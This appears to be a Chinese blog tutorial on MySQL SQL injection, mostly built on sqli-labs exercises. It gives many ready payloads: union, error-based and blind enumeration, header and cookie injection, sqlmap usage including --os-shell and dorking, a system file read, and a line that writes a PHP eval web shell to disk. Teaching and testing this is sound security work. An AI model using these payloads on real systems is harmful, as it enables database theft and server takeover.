azure sql 网络安全组 网络安全sql注入

🍅 点击文末小卡片 ,免费获取网络安全全套资料,资料在手,涨薪更快

SQL注入

1、原理

针对注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。

其成因可归结为以下两个原理叠加造成:

1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句

2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。

2、漏洞危害

攻击者利用SQL注入漏洞们可以获取数据库中的多中信息(如:管理员后台密码),从而脱取数据库中内容(脱库)。在特别情况下还可以修改数据库内容或者插入内容到数据库,如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者就可以通过SQL注入漏洞直接获取webshell 或者服务器系统权限。mof提权 、 udf提权

3、分类

SQL注入漏洞根据不同的标准,从数据类型分类来看SQL注入分为数字型和字符型。数字型注入就是说注入点的数据,拼接到SQL语句中是以数字型出现的,即数据两边没有被单引号、双引号包括。字符型注入正好相反按照提交数据的位置分类GET、POST、Cookie和称GPC数据库对基本的数据类型分为三大类:数字、文本、时间

根据注入手法分类,大致分为以下几个类别

复制代码
联合查询    union query SQL injection
报错注入    Error-based SQL injection
布尔盲注    
延时注入
堆叠查询

联合查询、报错注入、布尔盲注、延时注入 ---查
堆叠查询    ---增删改
联合查询、报错注入   ---可以看到数据库的回显,包括正确和错误信息
布尔盲注、延时注入   ---看到的页面的状态,不是数据库的回显

4、Mysql相关

复制代码
注释
#
-- (杠杠空格)
/* ... */
/*! ... */ 内联查询

部分数据库函数

|-----------------------|------------------------|-------------------------------------------------------------|
| =|>|>=|<=|<> | 比较运算符 | SELECT 1<>2; |
| and|or | 逻辑运算符 | select 1 and 0; |
| version() | mysql 数据库版本 | select version(); |
| database() | 当前数据库名 | select database(); |
| user() | 用户名 | select user(); |
| current_user() | 当前用户名 | select current_user(); |
| system_user() | 系统用户名 | select system_user(); |
| @@datadir | 数据库路径 | select @@datadir; |
| @@version_compile_os | 操作系统版本 | select @@version_compile_os; |
| length() | 返回字符串长度 | select length('ffdfs');select length(version()); |
| substring() | 截取字符串(三个参数) | select substring("dhffjf",2,2); |
| substr() | 1、截取的字符串2、截取的起始位置,从1开始 | select substr("version()",2);select substr(version(),2,10); |
| mid() | 3、截取长度 | select mid(' select ',2,6); |
| left() | 从左侧开始去指定字符个数的字符串 | select left('adc',2);select left(version(),2); |
| concat() | 没有分隔符的连接字符串 | select concat('a','b','c'); |
| concat_ws() | 含有分隔符的连接字符串 | select concat_ws('/','a','b','c');|| |
| group_concat() | 连接一个组的字符串 | select group_concat(id) from users; |
| ord | 返回ASCII码 | select ord('a'); |
| ascii() | | select ascii('a'); |
| hex() | 将字符串转换为十六进制 | select hex('a'); |
| unhex() | hex 的反向操作 | select unhex(61); |
| md5() | 返回MD5 值 | select md5('123456'); |
| floor(x) | 返回不大于x 的最大整数 | |
| round() | 返回参数x 接近的整数 | |
| rand() | 返回0-1 之间的随机浮点数 | select rand(); |
| load_file() | 读取文件,并返回文件内容作为一个字符串 | |
| sleep() | 睡眠时间为指定的秒数 | select sleep(5); |
| if(true,t,f) | if判断 | select if(true,1,0);select if(false,1,0); |
| find_in_set() | 返回字符串在字符串列表中的位置 | |
| benchmark() | 指定语句执行的次数 | |
| name_const() | 返回表作为结果 | |

1、SQL语句解析过程
复制代码
SQL 语句解析过程
from -->group by --> having --> select -->order by 
from 后面的表标识了这条语句要查询的数据源
from 过程之后会形成一个虚拟的表VT1.

# where
where 对VT1 过程中生成的临时表进行过滤,满足where 子句的列被插入到VT2 .

# group by
group by 会把VT2 生成的表按照group by 中的列进行分组,生成 VT3

# having
having 这个group by 的子句对VT3 表中的不同分组进行过滤,满足having 条件的子句被加入到VT4 表中。

# select
select 这个子句对select 子句中的元素进行处理,生成VT5
计算select 子句中的表达式,生成VT5.1
distinct 删除VT5.1表中的重复列,生成VT5.2
top 从order by 子句中定义的结果中,删选出符合条件的列,生成VT5.3

# order by
order by 从VT5.3 中的表,根据子句中的结果进行排序,生成VT6

4、注入点

注入点可能的位置根据SQL 注入漏洞的原理,在用户"可控参数"中注入SQL 语法,也就是说Web 应用在获取用户数据的地方,只要代入数据库查询,都有存在SQL 注入的可能,这些地方通常包括:GET 数据、POS 数据、HTTP头部(HTTP请求报文其他字段)、Cookie 数据

5、注入点判断

复制代码
判断类型
123'    返回页面包含123时,为字符型,没有123是为数字
考虑闭合类型 ' " ') ") ')) "))

+1、-1   有变化有回显考虑联合查询;有变化有报错考虑报错注入;没变化没报错没回显考虑布尔盲注;没有以上情况,考虑延时注入

是否有回显           联合查询
是否有报错           报错注入
是否有布尔类型状态     布尔盲注
绝招                 延时注入

判断布尔类型的状态
?id=35 and 1=1    ?id=35 and 1=2
    (如果1=2正常,可能为字符型)

判断延时
?id=35 and sleep(5)     可以通过F12-->'网络'进行查看

6、联合查询注入

复制代码
联合查询就是SQL 语法中的union select 语句。该语句会同时执行两条select 语句,
        
        前面语句为假时,显示后面语句执行的结果

生成两张虚拟表,然后把查询到的结果进行拼接。
select ~~~~ union select ~~~~
由于虚拟表时二维机构,联合查询会"纵向"拼接两张虚拟表
        实现跨库|跨表查询
必要条件
@ 两张虚拟的表具有相同的列数
@ 虚拟表对应的数据类型相同
1、判断字段个数(列数)
复制代码
使用[order by] 语句来判断当前select 语句所查询的虚拟列表的列数。
[order by] 语句本意时按照某一列进行排序,在mysql 中可以使用数字来代替具体的列名,比如[order by 1] 就是按照第一列进行排序,如果mysql 没有找到对应的列,就会报错[Unkown column].我们可以依次增加数字,知道数据库报错。

    判断显示位置、列数
    得到字段个数之后,可以尝试构造联合查询语句
    这里我们并不知道表名,根据mysql 数据库的特性,select 语句执行过程中,并不需要指定表名。。

    ?id=33 union select 1,2,3,4,5,6,7,8,9,10--+
    返回错误时,表示没有该列数
    ?id=33 union select null,null,null,null,null,null,null,null--+

    页面显示的是第一张虚拟表的内容,那么我们可以考虑让第一张虚拟表的查询条件为假,则显示第二条记录。因此构造SQL,语句:

    ?id=33 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,--+
    ?id=-33 1=2 union select 1,2,3,4,5,6,7,8,9,10,--+

    如下图---显示出数据

llegal mix of collations for operation 'UNION'出错时

编码限制绕过

采用hex(16进制编码)

复制代码
?id=-33 union select  1,2,3,4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema=database() 

?id=-33 union select  1,2,hex((select group_concat(table_name) from information_schema.tables where  table_schema='security'  )),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()

不支持字符型时,采用16进制转换

16进制需要在转换后加上0x

7、报错注入

1、group by 重复键冲突(floor)
复制代码
group by是mysql天生的BUG(编号#8652),是一种比较可靠的注入方式 有一定的成功率,可能成功,也可能不成功,建议多试几次

?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)

select a,count(*) from r1 group by round(rand(),1);

select floor(rand()*3),a,count(*) from r1 group by 1; 

select min(@a:=1) from(select 1 union select null union select !1)a group by concat('~',@@version,'~',@a:=(@a+1)%2);

在concat()里面添加条件
2、extractvalue()
复制代码
?id=1 and extractvalue(1,concat('~',(select version()),'~')) --+
3、updatexml()
复制代码
?id=1 and updatexml(1,concat('~',(select version()),'~')) --+

8、布尔盲注

复制代码
获取数据库名
    数据库名长度
[... and length(database())<=10 --+]
[... and length(database())=3 --+]
    数据库名
[... and ascii(substr(database(),1,1))=99--+]

9、延时注入

复制代码
利用sleep() 语句的延时性,以时间线作为判断条件
获取数据库名
    获取数据库名长度
?id=1 and if((length(database())=3),sleep(5),1)--+

    数据库名第二位
?id=1 and if((ascii(substr(database(),2,1,)=109),sleep(5),1)

10、sqlmap

复制代码
get注入

-u "url"    检测注入点
--dbs       列出所有数据库的名字
--current-db    列出当前数据的名
-D      指定一个数据库
--tables    列出表名
-T  指定表名
--columns   列出所有字段名
-C  指定字段
--dump  列出字段内容

----------

post注入

-r post.txt 从文件中读入http请求(post.txt是用burpsuite抓取得post数据包构成)
--os-shell  获取shell
sqlmap -g "inurl:php?id="   利用google 自动搜索注入点

---------

携带cookie 的认证
要测试的页面只有在登录状态下才能访问,登录状态用cookie识别
--cookie ""

11、其他注入

SQL 注入文件读写
复制代码
SQL 注入漏洞文件读写文件。但是读写文件需要一定的条件
该参数再高版本的mysql 数据库中限制了文件的导入导出。
改参数可以写在my.ini 配置文件,并重启mysql 服务。
打开my.ini 配置文件,在mysqld下添加 secure-file-priv
读取文件操作
复制代码
... union select 1,load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'),3 --+
写入文件操作
复制代码
?id=1 and union select 1,2,"<?php @eval($_REQUESTS[777]);?>",4 into outfile "c:\\phpstudy\\www\\2.php"
宽字节注入
复制代码
使用?id=1,页面有回显,使用联合注入查询
使用?id=1'测试的时候,会发现单引号被\转义了
        测试网站的编码是GBK编码,其采用双字节编码范围,GBK的编码范围,
    8140-FEFE(高字节从81到FE,低字节从40到FE)
?id=1%df' union select 1,2,3 --+
Cookie注入
复制代码
在控制台输入

    document.cookie="uname =Dumb' and extractvalue(1,concat(0x7e,database(),0x7e),1)#

    也可以用burpsuite抓包修改Cookie

base64注入
复制代码
base64 编码是以==结尾
 

我们以sqli-labs 第22关来说明base64 注入的问题
base注入 就是将注入的字段经过base64 编码,
发现22 关是输入Cookie 型的base64 注入,使用报错注入手法
uname =Dumb" and updatexml(1,concat(0x5e,version(),0x5e),1)#
base64 编码之后:
RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDVlLHZlcnNpb24oKSwweDVlKSwxKSM=
HTTP 头部注入
复制代码
User-Agent 注入

    sqli-labs 第18关
    payload
    User-Agent:hacker' and updatexml(1,concat(0x5e,version(),0x5e),1) and '1'='1

复制代码
Referer 注入
第19 关,注入字段在Referer 中

    hacker' and updatexml(1,concat(0x5e,version(),0x5e),1) and '1'='1

12、防御

复制代码
1、对用户输入的数据进行过滤
2、增设WAF
3、添加PDO

最后感谢每一个认真阅读我文章的人,礼尚往来总是要有的,虽然不是什么很值钱的东西,如果你用得到的话可以直接拿走:

上述所有都有配套的资料 ,这些资料,对于做【网络安全】的朋友来说应该是最全面最完整的备战仓库,这个仓库也陪伴我走过了最艰难的路程,希望也能帮助到你!凡事要趁早,特别是技术行业,一定要提升技术功底。

相关推荐
数据智能老司机12 小时前
CockroachDB权威指南——CockroachDB SQL
数据库·分布式·架构
数据智能老司机12 小时前
CockroachDB权威指南——开始使用
数据库·分布式·架构
松果猿13 小时前
空间数据库学习(二)—— PostgreSQL数据库的备份转储和导入恢复
数据库
无名之逆13 小时前
Rust 开发提效神器:lombok-macros 宏库
服务器·开发语言·前端·数据库·后端·python·rust
s91236010113 小时前
rust 同时处理多个异步任务
java·数据库·rust
数据智能老司机13 小时前
CockroachDB权威指南——CockroachDB 架构
数据库·分布式·架构
hzulwy13 小时前
Redis常用的数据结构及其使用场景
数据库·redis
程序猿熊跃晖14 小时前
解决 MyBatis-Plus 中 `update.setProcInsId(null)` 不生效的问题
数据库·tomcat·mybatis
Three~stone15 小时前
MySQL学习集--DDL
数据库·sql·学习